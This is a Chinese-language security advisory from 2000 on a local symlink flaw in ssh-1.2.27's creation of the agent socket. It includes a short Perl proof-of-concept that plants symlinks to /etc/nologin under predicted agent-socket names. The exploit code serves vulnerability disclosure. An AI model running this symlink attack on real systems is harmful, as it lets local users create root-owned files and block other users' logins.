ssh-1.2.27本地溢出发布时间:2000-05-16 更新时间:2000-05-16 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 ssh-1.2.27详细描述 本地ssh-1.2.27允许在一些机器的文件系统中建立一个带任意文件名的UNIX domain套接口。 测试代码 #!/usr/bin/perl # # vulnerable: SSH 1.2.27 # # A vulnerability in SSH's creation of the authentication # agent UNIX domain socket allows local users to create a # UNIX domain socket with an arbitrary file name in the # system. # # SSH has the concept of authentication proxying via the # SSH authentication agent. It allows for a basic kind of # Single Sign-On capability. The sshd daemon, ssh and ssh # -agent communicate via a UNIX domain socket normally of # the form '/tmp/ssh-<username>/agent-socket-<pid>'. # # SSH follows symbolic links while creating the socket as # root thus allowing any local users with ssh access to # create a socket with an arbitrary filename in the # system. # # Notice that this will not work under all operating # systems. Some operating systems do not follow symbolic # links during bind on UNIX domain sockets. Linux 2.0.x, # Solaris 2.5.1 and IRIX 6.5.2 do not follow symbolic # links during bind(2). Linux 2.1.x does. $pid = $$; $whoami = `whoami`; chop($whoami); mkdir("/tmp/ssh-$whoami", 0700); for ($i = $pid; $i < $pid+50; $i++) { symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent"); } 解决方案 尚无 相关信息 |
